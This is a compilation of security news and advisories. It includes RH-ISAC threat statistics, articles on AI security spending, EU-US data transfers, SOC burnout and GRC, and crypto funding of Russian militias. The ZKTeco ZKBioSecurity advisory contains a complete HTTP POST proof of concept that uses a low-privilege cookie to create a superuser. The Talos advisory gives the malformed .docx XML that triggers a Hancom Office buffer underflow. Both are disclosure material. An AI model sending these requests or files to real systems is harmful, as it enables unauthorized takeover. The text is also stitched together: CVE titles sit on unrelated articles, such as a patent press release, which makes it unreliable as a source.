Why bother with new tactics and exploits when the old tricks are still effective?

Cybercriminals targeting the retail and hospitality industry are sticking to tried and tested threat vectors, such as credential harvesting and phishing, according to analysis by the Retail & Hospitality Information Sharing and Analysis Center (RH-ISAC).

An ISAC is an industry-specific organization that acts as a centralized repository of information on threats affecting a specific industry sector. Member organizations share threat intelligence and mitigation information, with the idea that organizations can prepare their defenses better if they know the kinds of attacks their peers are experiencing.

The "RH-ISAC Intelligence Trends Summary," which encompasses information shared by member organizations from May to August, highlights shifts in the threat landscape for the retail, hospitality, and travel sectors. Credential harvesting was "by far the most prevalent reported threat," at 63%, according to the report. Suspicious domains were the second most prevalent, at 16%. Other threat indicators reported by members include malicious domains (3%), botnets (3%), and adversary-in-the-middle attacks (4%).

Ten malware families made up 81% of total reports the RH-ISAC tracked during the four-month period, of which Emotet was the most prevalent. While it's possible that the rise in Emotet-related reports could be connected to member organizations' focusing more on Emotet defense, it also suggests that Emotet activity is "once again steady after the group's reemergence earlier this year," the report says.

RH-ISAC isn't just about reporting threat indicators — member organizations also share information about specific threat topics. The "Top Sharing Trends" graph is an indicator of what kinds of threats organizations are most concerned about.

    

Credential harvesting remains the most common threat shared by members, at 43%, followed by phishing, at 16%. Information about malware attacks — namely Agent Tesla, Formbook, and Emotet — made up 31% of the threats shared by members.

The "Top Sharing Trends" graph outlines the frequency of sharing regarding a threat topic, while the "Top Reported Trends" graph shows the volume of threat indicators shared related to a given topic, according to RH-ISAC.

Credential Harvesting Is Retail Industry's Top Threat

Panini Everest Engine 2.0.4 allows unprivileged users to create a file named Everest.exe in the %PROGRAMDATA%\Panini folder. This leads to privilege escalation because a service, running as SYSTEM, uses the unquoted path of %PROGRAMDATA%\Panini\Everest Engine\EverestEngine.exe and therefore a Trojan horse %PROGRAMDATA%\Panini\Everest.exe may be executed instead of the intended vendor-supplied EverestEngine.exe file.

Panini, a global payments technology leader, officially announced that its Everest solution architecture that integrates computing platforms with check capture, was recently fully patented in the United States. This newly established approach is ground-breaking and further substantiates Panini as a visionary in payments technology.

Panini’s Everest unleashes the full power of Panini scanning platforms while dramatically removing the cost and complexity of integration, deployment and support for its customers and partners. Check scanning devices developed with this new technology can be used in different settings and even shared among users, making the move from Branch Image Capture (BIC) to Teller Image Capture (TIC) more attractive to financial institutions and aligning with the “bank of the future” trend of empowering roaming universal bankers in an open lobby environment. Not only will Everest offer more solution options for bank branches, but it will make Remote Deposit Capture (RDC) applications more flexible and easier to deploy and support: new devices like Panini’s EverneXt™ (up to 160 documents per minute) and mI:Deal™ (single feed) can easily be operated by a smart phone, tablet, or computer, with no need to download an API and keep it up-to-date over time. 

The Everest technology integrated into Panini scanning platforms enables the capture devices to be connected to any computing platform (such as tablets, PCs, smartphones, and POS terminals) via a choice of wired or wireless interfaces (Wi-Fi, Ethernet, USB), while replacing the traditional complexity of integration via API (application programming interface) with a state-of-the-art, secure HTTPS communications protocol. This architecture is the next decisive step in the evolution of Panini platforms designed to write the next chapter of paper-based payments dematerialization.

“Panini’s Everest-enabled intelligent scanning platforms open new possibilities for our customers and partners including on-board applications, shared devices, and untethered operation”, said Michael Pratt, Chief Executive Officer at Panini.

On October 4, 2016, the United States Patent and Trademark Office (USPTO) assigned Patent number 9,460,427 to the Everest technology, which builds on decades of Panini’s experience as a global leader in payments capture and displays yet another differentiator in the market. Panini thus continues to prove they operate as a dynamic and innovative organization delivering breakthrough, game-changing solutions.

**About Panini**  
Founded in Turin, Italy, Panini has enabled clients to capitalize on shifts in the global payments processing market for more than seventy years. Panini has a rich history of technology innovation, leveraging the company’s expertise in research & development. Panini’s market leading solutions are based on state-of-the-art engineering resources and ISO-9001 quality certified production. Panini offers check capture solutions that enable customers to fully realize the advantages and efficiencies available with the digital transformation of the paper check, resulting in the world’s largest deployed base of check capture systems, now approaching one million devices. Panini’s scalable check capture solutions address the complete range of distributed check processing opportunities including teller capture, back-counter capture, remote deposit capture, remittance processing and point-of-sale capture. The company provides solutions on a global basis, and has direct subsidiary operations in the United States covering North America and in Brazil covering Latin American markets. For more information visit: www.panini.com.

*   Português
*   Español
*   Italiano

CVE-2022-39959: Panini Patents Revolutionary New “Everest” Architecture

An access control issue in ZKTeco ZKBioSecurity V5000 3.0.5_r allows attackers to arbitrarily create admin users via a crafted HTTP request.

**Full Disclosure mailing list archives**

_From_: Caio B <caioburgardt () gmail com>  
_Date_: Thu, 29 Sep 2022 11:20:39 -0300  

#######################ADVISORY INFORMATION#######################

Product: ZKSecurity BIO

Vendor: ZKTeco

Version Affected: 3.0.5.0\_R

CVE: CVE-2022-36634

Vulnerability: User privilege escalation

#######################CREDIT#######################

This vulnerability was discovered and researched by Caio Burgardt and
Silton Santos.

#######################INTRODUCTION#######################

Based on the hybrid biometric technology and computer vision technology,
ZKBioSecurity provides a comprehensive web-based security platform. It
contains multiple integrated modules: personnel, time & attendance, access
control, visitor management, offline & online consumption management, guard
patrol, parking, elevator control, entrance control, Facekiosk, intelligent
video management, mask and temperature detection module, and other smart
sub-systems.

#######################VULNERABILITY DETAILS#######################

The application's access control management does not check the session's
permissions correctly. An attacker with "Person Self-Login" or "User"
privilege can create a super user with full privileges in the application

#######################PROOF OF CONCEPT#######################

POST /authUserAction!edit.action HTTP/1.1

Host: {HOST}

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101
Firefox/102.0

Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data;
boundary=---------------------------291763244192371568695079347

Content-Length: 1956

Origin: http://{HOST}:8088

Connection: close

Referer: http://{HOST}:8088/base\_index.action

Cookie: <INSERT\_LOW-PRIVILEGE\_COOKIE\_HERE>

Upgrade-Insecure-Requests: 1





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.username"





test\_privesc

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.loginPwd"





KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="repassword"





KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isActive"





true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isSuperuser"





true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="groupIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="deptIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="areaIds"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.email"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.name"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.lastName"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerTemplate"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerId"





-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="logMethod"





add

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="un"





1657813612925\_286

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="systemCode"





base

-----------------------------291763244192371568695079347--





#######################END#######################
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **ZKBioSecurity 3.0.5- Privilege Escalation to Admin (CVE-2022-36634)** _Caio B (Sep 30)_

CVE-2022-36634: ZKBioSecurity 3.0.5- Privilege Escalation to Admin (CVE-2022-36634)

A boom in artificial intelligence-powered detection and remediation tools pushes security spending to the top of the AI market, according to Forrester.

By 2025, the artificial intelligence (AI) software market will expand from 2021's $33 billion to $64 billion, according to a new report. And cybersecurity is the fastest-growing category of AI spend, experiencing a rise in spending of 22.3% compound annual growth rate (CAGR).

That's according to the "Global AI Software Forecast 2022" from Forrester Research. "Cybersecurity is the fastest AI software growth category, with a focus on the real-time monitoring of and response to attacks," the report states. The next two categories, customer and human capital management (22%) and process optimization, knowledge, and data intelligence (18.3%), also have cybersecurity elements, so the impact on security tool makers could be even more significant.

This comports with the emphasis companies have placed on their AI-enhanced software and services. For example, credit behemoth Visa revealed it has spent a half-billion dollars on data analytics and AI in the past five years. It's using those tools, along with conventional cybersecurity measures, to keep the fraud rate at what Visa calls historic lows despite e-commerce growth.

Organizations can deploy AI for cybersecurity anywhere there's repetitive actions and expected behavior, including attack surface management, extended detection and response (XDR), and user and entity behavior analytics (UEBA). Forrester calls out SentinelOne as a prime example of an XDR success story, pointing out the company's 120% year-over-year revenue growth in fiscal 2022. In March, SentinelOne added identity threat detection and response to its platform when it acquired Attivo Networks.

An AI tool can learn what normal activity from a particular device or account is and then flag when that endpoint is acting outside of the norm. Such automated detection is invaluable, considering the impossibility of staffing sufficiently to have human eyes watching every part of the network. And researchers are finding ways to apply large language models like GPT-3 to practical tasks, such as tracing networks of exploit forums. To provide some perspective on such developments, Dark Reading released a report in September, "How Machine Learning, AI & Deep Learning Improve Cybersecurity," about how to assess a vendor's AI claims and define its success criteria.

One hitch in AI's gallop is the challenge of setting up a system so that it flags what is necessary for human analysts to assess without creating alert fatigue. A survey earlier in 2022 revealed that almost half (46%) of IT security staff said their AI systems created too many false-positive alerts for them to address. An optimist would see the false-positive problem as an opportunity for growth, however, opening up a new market for fine-tuning services.

For more insights, visit the Forrester Research blog entry about the report.

Cybersecurity Will Account for Nearly One-Quarter of AI Software Market Through 2025

A new executive order tries to reassure Europeans that their data is safe on US soil, despite government surveillance.

The United States is not going to stop spying on Europeans’ data, but it is going to make sure that spying is “proportionate.” This was the reassurance that US President Joe Biden offered concerned citizens across the Atlantic today by signing an executive order designed to restart the easy flow of data between Europe and the US.

For years, companies have been shuttling customer information between the two regions. “Transatlantic data flows are critical to enabling the $7.1 trillion EU-US economic relationship,” the White House said today. But two years ago, the EU Court of Justice in Luxembourg ruled that Europeans’ data sent to the US risked being snooped on by intelligence agencies, such as the US National Security Agency. As a result, the agreement that allowed companies to easily transfer data between the US and Europe was ripped up. Businesses instead had to make do with a costly and complex temporary replacement.

Biden’s executive order brings a new EU-US data privacy agreement one step closer and aims to restore trust among Europeans’ concerned by US government surveillance. The order creates a new body within the US Department of Justice that will oversee how US national security agencies access both Europeans’ and Americans’ data. But privacy campaigners say the order simply copies the wording of European law (adding in terms like _proportionate_ and _necessary_) without making any real changes. “We do not see a ban on bulk surveillance and no actual limitations,” says Max Schrems, the Austrian privacy activist whose legal complaint against Facebook eventually dismantled the transatlantic data pact back in 2020.

Before then, around 5,000 businesses had been sending data back and forth across the Atlantic under a system called Privacy Shield. “The pre-Schrems system worked,” says Morgan Reed, president of the App Association, which represents small- and medium-size companies, mostly app developers. But the EU court ruling made the Privacy Shield system suddenly invalid, plunging thousands of companies into legal limbo.

Although the court decision did not stop transfers, it made them more complicated. “What the Schrems decision did was raise costs and concern for a lot of small companies that don't have giant compliance departments’ and fleets’ worth of lawyers to do what are called standard contractual clauses,” says Reed. Standard contractual clauses are time-consuming data transfer agreements that force companies to take steps to assess whether they are safely moving data around the world. 

Companies that have spent the past two years wrestling with these clauses are pleased by the order; they want to get back to business as usual. The executive order is the next step in the US and EU reaching a new privacy agreement. “We appreciate President Biden’s action to keep data flowing between the US and EU, underpinning one of our deepest and most mutually beneficial trading relationships,” says Matt Schruers, president of the Computer and Communications Industry Association (CCIA), a lobbying group that represents tech giants including Google, Amazon, and Apple.

At Workday, a California-based HR software provider with more than 2,000 customers headquartered in Europe, the mood is optimistic. Chandler Morse, vice president of corporate affairs, believes this is evidence that the US and EU can reach an agreement on more than just the privacy shield problem. “There's a number of other tech issues that are pending in the EU-US bilateral, so for many of us this is a positive sign that the EU and the US can work together,” he says, adding that the EU AI Act and Data Act could also be beneficiaries of this new cooperation.

Yet privacy campaigners are not impressed—either by greater collaboration or Biden’s offer of a so-called Data Protection Review Court, which will allow EU citizens to challenge how US security agencies use their data.

“However much the US authorities try to paper over the cracks of the original Privacy Shield, the reality is that the EU and US still have a different approach to data protection which cannot be canceled out by an executive order,” says Ursula Pachl, deputy director general of the European Consumer Organization (BEUC). “The moment EU citizens’ data travels across the Atlantic, it will not be afforded similar protections as in the EU.”

Biden’s executive order will now be sent to Brussels, where EU officials could spend up to six months scrutinizing the details. A new data agreement is expected to be ready around March 2023, although privacy activists are expected to challenge the ruling in court. “The order is never going to be enough for the privacy community in Europe,” says Tyson Barker, head of technology and global affairs at the German Council on Foreign Relations.

The European Commission believes the new agreement could survive a court challenge. But the US has been quietly hedging its bets, says Barker. At a conference in October 2021, Christopher Hoff, deputy assistant secretary for services in the Biden Administration, said he supported the global expansion of a rival privacy agreement—the Asia-Pacific Economic Cooperation Cross-Border Privacy Rules system. “The United States wants to say, actually, we have an alternative and we'd like to set this as the global standard,” Barker adds.

Schrems, however, is not worried about another privacy agreement curbing the EU’s influence. “I don’t personally care what standards other countries prefer,” he says. “I know the law in the EU.”

Biden’s Privacy Order Slaps a Band-Aid on the EU-US Data Crisis

A buffer underflow vulnerability exists in the way Hword of Hancom Office 2020 version 11.0.0.5357 parses XML-based office files. A specially-crafted malformed file can cause memory corruption by using memory before buffer start, which can lead to code execution. A victim would need to access a malicious file to trigger this vulnerability.

**SUMMARY**

A buffer underflow vulnerability exists in the way Hword of Hancom Office 2020 version 11.0.0.5357 parses XML-based office files. A specially-crafted malformed file can cause memory corruption by using memory before buffer start, which can lead to code execution. A victim would need to access a malicious file to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Hancom Office 2020 Hancom Office 2020 11.0.0.5357

**PRODUCT URLS**

Hancom Office 2020 - https://office.hancom.com/

**CVSSv3 SCORE**

7.8 - CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-124 - Buffer Underwrite (‘Buffer Underflow’)

**DETAILS**

Hancom Office is considered one of the more popular Office suites used within South Korea.

After enabling PageHeap for the application and HwordApp.dll, attempting to open the malicious file results in the following exception in the debugger:

    (150c.1f44): Access violation - code c0000005 (first/second chance not available)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=131d1490 ebx=00ef9fa4 ecx=dcbaaaaa edx=00000001 esi=00ef9f64 edi=00ef9ea0
    eip=6a55d80c esp=00ef9dac ebp=00ef9de4 iopl=0         nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
    HwordApp!SetInitFontCallbackFunc+0x4f619c:
    6a55d80c 8b01            mov     eax,dword ptr [ecx]  ds:002b:dcbaaaaa=????????
    

A few assembly instructions prior, we see the following code (we assume the HwordApp.dll is loaded at the base address of 0x6a010000):

    .text:6A55D803 loc_6A55D803:
    .text:6A55D803 mov     eax, [esi+0A30h]
    .text:6A55D809 mov     ecx, [eax-4]                                  (1)
    .text:6A55D80C mov     eax, [ecx]                                    (2)
    .text:6A55D80E call    dword ptr [eax+10h]                           (3)
    

The pointer is decremented by 4 at location (1) and is dereferenced at (2) where the code eventually crashes.

At location (1), eax holds the pointer to memory allocated in the heap. Since we have enabled PageHeap, we can see metadata related to this heap allocation, like allocation size, the stack trace of the allocating code, etc. In memory, these metadata reside just before the heap allocation returned to the application. We can examine the metadata with the following command:

    0:002> dt _DPH_BLOCK_INFORMATION eax-20
    ntdll!_DPH_BLOCK_INFORMATION
       +0x000 StartStamp       : 0xabcdaaaa
       +0x004 Heap             : 0x84801000 Void
       +0x008 RequestedSize    : 4
       +0x00c ActualSize       : 0x2c
       +0x010 FreeQueue        : _LIST_ENTRY [ 0x48010c0 - 0x12bd4230 ]
       +0x010 FreePushList     : _SINGLE_LIST_ENTRY
       +0x010 TraceIndex       : 0x10c0
       +0x018 StackTrace       : 0x050f2284 Void
       +0x01c EndStamp         : 0xdcbaaaaa
    

The code attempts to dereference a pointer with the erroneous value of 0xdcbaaaaa, which is the EndStamp magic value at the end of PageHeap metadata.

As evident in the RequestedSize field, the application requested an allocation of 4 bytes. However, the code effectively attempts to dereference a pointer that resides 4 bytes prior to that allocation.

After reversing the code, it was found that the application crashes in an attempt to parse XML data, specifically the </w:p> XML tag. The malicious file is in the .docx format, which is a .zip file containing various XML files. Unzipping the malicious file, we see the following in word/document.xml:

    <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    ...
    <w:body></w:p></w:body>
    

The </w:p> XML tag denotes the end of a paragraph in the .docx format. Providing the open tag <w:p> before the end tag, the application does not crash. From our analysis, it was evident that the application keeps a vector-type data structure containing pointers of objects. When there is an open tag followed by a close tag, the vector holds two pointers with a total size of 8 bytes (2 pointers of 4 bytes each) and the code works correctly. When there is only the close tag, the code assumes there is another element in the vector, decrements the pointer to the vector by 4 and attempts to dereference and call the erroneous pointer.

At location (3) in the code listing above, we see this pointer being used as a target to an indirect call, in a typical behaviour to a virtual function table call in C++. As a result, the code will attempt to make a call to an erroneous pointer that resides in memory.

Using heap spraying techniques, an attacker could force the application to allocate memory that resides immediately before the buffer and make it contain arbitrary data. As a result, the attacker could be able to control the pointer that will eventually be used for the indirect call, resulting in arbitrary code execution.

**TIMELINE**

2022-07-14 - Vendor Disclosure  
2022-09-30 - Vendor Patch Release  
2022-10-04 - Public Release

CVE-2022-33896: TALOS-2022-1574 || Cisco Talos Intelligence Group

Today, the processing of mountain-high stacks of alarms is considered "security." That system is failing customers and the cybersecurity workforce.

In one of my first jobs, I worked as a file clerk. I would arrive early in the morning to be greeted by a mountain-high stack of manila folders to process. I would spend the day knocking down the pile, only to be greeted by a new one the next day. It was clear that I was never going get ahead in that job.

Recently, I read a cybersecurity provider's infographic that depicts the logs from 350,000 machines feeding a security information and event management (SIEM) system, resulting in a data lake consisting of 1.1 billion security events. An artificial intelligence detection layer, employing thousands of algorithms, processes those billions of events into an investigation layer and visualization platform.

My first thought was, it's that clerk job all over again! How can a security operations center (SOC) team possibly get ahead in this environment? At a time when SOCs are more critical than ever, SOC analysts have never been stretched so thin from the relentless, reactive, and "always on" mode their job demands. As a result, the cybersecurity industry is in danger of losing a generation of talented analysts because of low morale, crushing workloads, and new security products that are built upon outdated approaches.

There is already a well-documented shortage of qualified security personnel today. According to the "(ISC)2 Cybersecurity Workforce Study," the shortage is estimated to reach 2.72 million globally. Increased workloads are a major contributor to burnout in our industry. In a survey conducted last fall, 51% of professionals surveyed were kept up at night by the stress of their jobs, and nearly half were working more than full-time hours.

Security teams are drowning in a sea of alert fatigue, incident response workload, and false positives. In today's cybersecurity ecosystem, the processing of mountain-high stacks of alarms is considered "security." That system is simultaneously failing customers and the cybersecurity workforce. Indeed, a recent study shows 45% of all daily security alerts are false positives, and 75% of organizations spend an equal amount — or more — on false positives than on legitimate attacks. In a multicontinent survey of security experts, 74% claimed their volume of false positives was steady or rising and 26% shared they "turn off alerts because they are too noisy." It comes as no surprise, therefore, that in 2022, many IT professionals are leaving their jobs — and the industry entirely.

Cybersecurity professionals are charged with protecting vital business as well as personal and national interests. With the average cost of a data breach now at an all-time high of $4.35 million and 83% of organizations having experienced more than one breach, the impact these professionals bring to the business is clear. A dearth of qualified people will only make the challenges of maintaining our vital interests more difficult, creating a terrible cycle. Providing the best work environment possible to retain and attract highly skilled professionals must become our highest priority as it is essential for long-term business success.

**Better Tools**

The problem cannot be solved by raising a few salaries. Instead, a transformative new approach is needed in which cybersecurity professionals have access to better tools and technologies so they can apply their talents and energies to address their actual priorities instead of chasing seemingly endless false positives and security alerts that lead nowhere and do not result in better organizational security. Not only will such a cybersecurity workforce be more fulfilled, but they will also be able to maintain a realistic work-life balance as well as deliver tangible value to business. Without this twofold approach to industry reform, we will continue to see the best and the brightest reconsider their chosen field and look elsewhere for opportunity, resulting in a massive destabilization of infrastructure.

We must immediately embrace new approaches that focus on prevention at scale and offer technologies that dramatically reduce incident response and false alerts. As singer-songwriter John Mayer describes gravity, "Twice as much ain't twice as good." Reducing the flood of alerts will make room for much-needed focus. Embracing a preventative approach will free up cybersecurity professionals to address their real priorities: protecting their clients, defeating malicious attackers, maintaining secure business continuity, and delivering more business value.

Cybersecurity professionals should be outthinking and outmaneuvering adversaries rather than being mired in alerts. The resulting security and protection will provide even more benefit to their organizations. It is possible to create a future for the cybersecurity industry that allows professionals to lead balanced lives while maintaining fulfilling careers without sacrificing the safety of critical networks.

Even though cyber threats continue to evolve and increase, forward-leaning organizations that embrace new, preventive approaches are benefiting from superior security, better business results, and meaningful, impactful work for their talented cybersecurity professionals. Employ a new preventative approach. Reduce the noise. Create better outcomes. Retain your best talent.

We Can Save Security Teams From Crushing Workloads. Will We?

Understanding the connection between GRC and cybersecurity
When talking about cybersecurity, Governance, Risk, and Compliance (GRC) is often considered the least exciting part of business protection. However, its importance can't be ignored, and this is why. 
While cybersecurity focuses on the technical side of protecting systems, networks, devices, and data, GRC is the tool that will help the

**Understanding the connection between GRC and cybersecurity**

When talking about cybersecurity, Governance, Risk, and Compliance (GRC) is often considered the least exciting part of business protection. However, its importance can't be ignored, and this is why.

While cybersecurity focuses on the technical side of protecting systems, networks, devices, and data, GRC is the tool that will help the entire organization understand and communicate how to do it.

What does it mean?

GRC tools like StandardFusion help companies define and implement the best practices, procedures, and governance to ensure everyone understands the risks associated with their actions and how they can affect business security, compliance, and success.

In simple words, GRC is the medium for creating awareness around cybersecurity's best practices to reduce risks and achieve business goals.

**Why is cybersecurity more relevant than ever before**

Cybersecurity aims to protect sensitive business data, intellectual property, personal and health information, and other company systems from cyber-attacks and threats. However, this task has become increasingly harder over the past few years.

Why is that?

Well, because of the ever-increasing global connectivity, new hybrid work models, the popularization of cloud services, and the evolution of technology, among others. Although all of these are great from a business perspective, they introduce new risks and challenges.

Here's the truth:

Cybersecurity has always been a critical part of organizations; however, in today's technological and interconnected landscape, they can't exist without it, at least in the long term.

**Understanding the principles of GRC**

Governance, Risk, and Compliance (GRC) is a business strategy for managing a company's overall governance, enterprise risk management, and regulatory compliance.

From a cybersecurity standpoint, GRC is a structured approach to aligning IT (people and operations) with business objectives while effectively managing risks and meeting regulatory needs.

In this context, to achieve business objectives and maximize the company's bottom line, organizations need to follow the best practices and procedures. This is why GRC exists... to mitigate any threat to productivity and the company's value by creating standards, policies, regulations, and processes.

More importantly, GRC helps build trust in the organization. This trust comes from improved efficiencies, better communication, employees' confidence to share information, and enhanced business outcomes.

That's not all.

GRC empowers companies to create a culture of value, giving everyone the education and agency to understand how they can protect the business's value, reputation and make better decisions.

**The crucial role of GRC in cybersecurity**

Organizations must align people, systems, and technologies with business objectives to achieve solid and effective cybersecurity. This means everyone should know and take the proper actions when executing their tasks — it's all about awareness and knowledge.

Governance, Risk, and Compliance is the best tool to create an integrated system that focuses on achieving objectives while addressing risks and acting with integrity.

GRC is crucial because it supports cybersecurity with vital business activities, such as:

*   Standardizing the best practices for everyone to act with integrity and security.
*   Assigns roles and responsibilities to business units and users, enhancing communication.
*   Helping with the implementation of data manipulation procedures.
*   Unifies vocabulary across departments and teams.
*   Supporting internal audits and encourages continuous control monitoring.
*   Assisting with risk mitigation internally and externally
*   Supporting meeting industry and government regulations.

GRC also provides a framework to integrate security and privacy with the organization's overall goals. Why is this important? Because it allows businesses to make informed decisions regarding data security risks quickly while mitigating the risk of compromising privacy.

**The role of GRC in cybersecurity – technical benefits**

The following are some of the vital benefits GRC offers cybersecurity:

**Third-party vendor selection:** Many organizations will use a third-party scorecard to gather basic information about potential vendors. This information includes: Corporate reputation, financials, network security, history of cyber breaches, geographic location, and more. A robust GRC model would support IT and security teams select and vet potential third-party vendors. More importantly, GRC will support the creation of vendor assessments and mitigation strategies.

**Risk mitigation:** IT can use GRC to understand the scope of cybersecurity and document the strengths and limitations of the current security program. GRC allows organizations to outline and act on different types of threats, potential damages, mitigation plans, and risk treatments.

**Regulatory compliance:** GRC is vital in keeping compliance in the loop as new regulations evolve worldwide. Moreover, it brings these evolving changes to the security team's attention ahead of time, providing time to plan and respond. Overall, GRC will help develop and manage the policies, regulations, and standards to meet the often-updated business and industry regulations.

**Audit support:** Modern organizations extend their procedures and protocols to provide proof and audit material to their auditors. Ensuring processes and best practices are well documented will show that the house is kept in order. Critical audit material may include: Incident response, cybersecurity awareness training, internal control test results, cybersecurity compliance reviews, and more. GRC helps craft and maintain a single source of truth for compliance that allows everyone to be on the right page.

**Data privacy:** GRC helps organizations stay on top of the ever-changing landscape of privacy regulations. How? by allowing the IT team to ensure that the appropriate protection, logging, geographic storage, etc. are in place to defend customers' and employees' data.

**Visibility:** GRC's integrated approach allows companies to get visibility into every aspect of their security compliance programs. This is vital as it enables different units, managers, and personnel to see the big picture and make data-drive and informed decisions.

In summary:

A well-planned GRC program enables organizations to:

*   Collect and maintain high-quality information
*   Improve decision making
*   Promote collaboration
*   Increase accountability
*   Build a strong culture
*   Increase efficiency and agility
*   Provide visibility
*   Reduces costs by supporting suitable investments
*   Increase integration
*   Protect the company's value and reputation

**GRC and Cybersecurity: Why do companies need an integrated approach?**

Integrating GRC and cybersecurity is imperative for organizations that want to build a long-term, successful security strategy. Aside from faster communication, congruent metrics, collaboration, and decision-making, the integration of GRC and cybersecurity offers other distinct advantages.

An integrated approach minimizes manual input and the potential for human error, reducing costs and giving organizations more time to create more value for the business.

More importantly, a strong integration helps the board to clearly and comprehensively visualize the organization's security posture. By understanding the cross-functional posture, business directors can tell better security stories to convey trust to customers and empower employees.

To sum up:

GRC and cybersecurity work hand in hand toward a lower-risk future and value creation, — they can't exist without each other. While cybersecurity aims to protect systems, networks, and data (from a technical perspective), GRC communicates the best method and practices to achieve so.

With an integrated approach, organizations will:

*   Increase efficiencies
*   Enhance security posture
*   Tell better security stories
*   Improve visibility across the board
*   Increase support from leadership
*   Avoid compliance/regulatory fines
*   IT and security teams set the tone for the entire company
*   Hand in hand toward a lower-risk future

**Empowering cybersecurity through GRC – methodology**

The OCEG has developed this Capability Model (Red Book) as an open-source methodology that merges the sub-disciplines of governance, risk, audit, compliance, ethics/culture, and IT into a unified approach.

Organizations can evolve this standard to address specific situations, from small projects to organization-wide rollouts. Some examples are:

*   Anti-corruption projects
*   Business continuity
*   Third-party management

The model is key to framing conversations about GRC capabilities with the board, senior executives, and managers. Also, organizations might use this GRC Capability Model with more specific functional frameworks, such as: ISO, COSO, ISACA, IIA, NIST, and others.

The GRC Capability Model encourages organizations to document best practices to:

*   Unify vocabulary across disciplines
*   Define common components and elements
*   Define common information requirements
*   Standardize practices for things like policies and training
*   Identify communication for everyone involved.

Now, let's see how it works.

The Capability Model has four parts:

1\. Learn

The main idea here is to identify the business culture, stakeholders, and organization's business practices to successfully guide their goals, strategy, and objectives.

As a process, it would look like this:

*   Learning business plans and goals
*   Understanding strategic objectives
*   Being aware of the current and future compliance activities
*   Connecting with the key stakeholders

2\. Align

This step focuses on unifying strategy with objectives and actions with strategies. The goal here is to have an integrated approach where senior leadership is engaged and supports the process of decision-making.

In simple words, this process needs:

*   Align business objectives with the strategy
*   Align executives with stakeholders' expectations
*   Align resource allocation planning with objectives

3\. Perform

After aligning business goals and objectives, it's time to perform. This step defines implementing appropriate controls and policies, preventing and remediating undesired risks, and monitoring to detect issues as soon as possible.

4\. Review

As a final step, it's imperative to review the design and operational performance of the current strategy and actions. More importantly, this step encourages organizations to analyze objectives to constantly enhance the integrated GRC activities.

What is the purpose of this model?

To develop a steady and integral improvement process to reach optimal performance and create value for the organization.

Get your free consultation with StandardFusion and learn how you can design an integrated GRC program to strengthen your cybersecurity and protect your organization's value.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

The essentials of GRC and cybersecurity — How they empower each other

Blockchain investigators have uncovered at least $4 million—and counting—in cryptocurrency fundraising has reached Russia's violent militia groups.

As Russian troops have flooded into Ukraine’s borders for the past eight months—and with an ongoing mobilization of hundreds of thousands more underway—the Western world has taken drastic measures to cut the economic ties that fuel Russia’s invasion and occupation. But even as those global sanctions have carefully excised Russia from global commerce, millions of dollars have continued to flow directly to Russian military and paramilitary groups in a form that’s proven harder to control: cryptocurrency.

Since Russia launched its full-blown invasion of Ukraine in February, at least $4 million worth of cryptocurrency has been collected by groups supporting Russia’s military in Ukraine, researchers have found. According to analyses by cryptocurrency-tracing firms Chainalysis, Elliptic, and TRM Labs, as well as investigators at Binance, the world’s largest cryptocurrency exchange, recipients include paramilitary groups offering ammunition and equipment, military contractors, and weapons manufacturers. That flow of funds, often to officially sanctioned groups, shows no sign of abating and may even be accelerating: Chainalysis traced roughly $1.8 million in funding to the Russian military groups in just the past two months, nearly matching the $2.2 million it found the groups received in the five months prior. And despite the ability to trace those funds, freezing or blocking them has proven difficult, due largely to unregulated or sanctioned cryptocurrency exchanges—most of them based in Russia—cashing out millions in donations earmarked for invaders.

“Our aim is to identify all the crypto wallets being used by Russian military groups and the people helping them; to find, seize and block all this activity that is helping to buy the bullets, the ammunition of this occupation,” says Serhii Kropyva, who until recently served as deputy of Ukraine’s Cyber Police and advisor to the country’s prosecutor general. “With the close cooperation of companies like Chainalysis and Binance, we can see all the wallets involved in this criminal activity, these money flows of millions of dollars. But we can, unfortunately, see that the transfer is continuing all the time.”

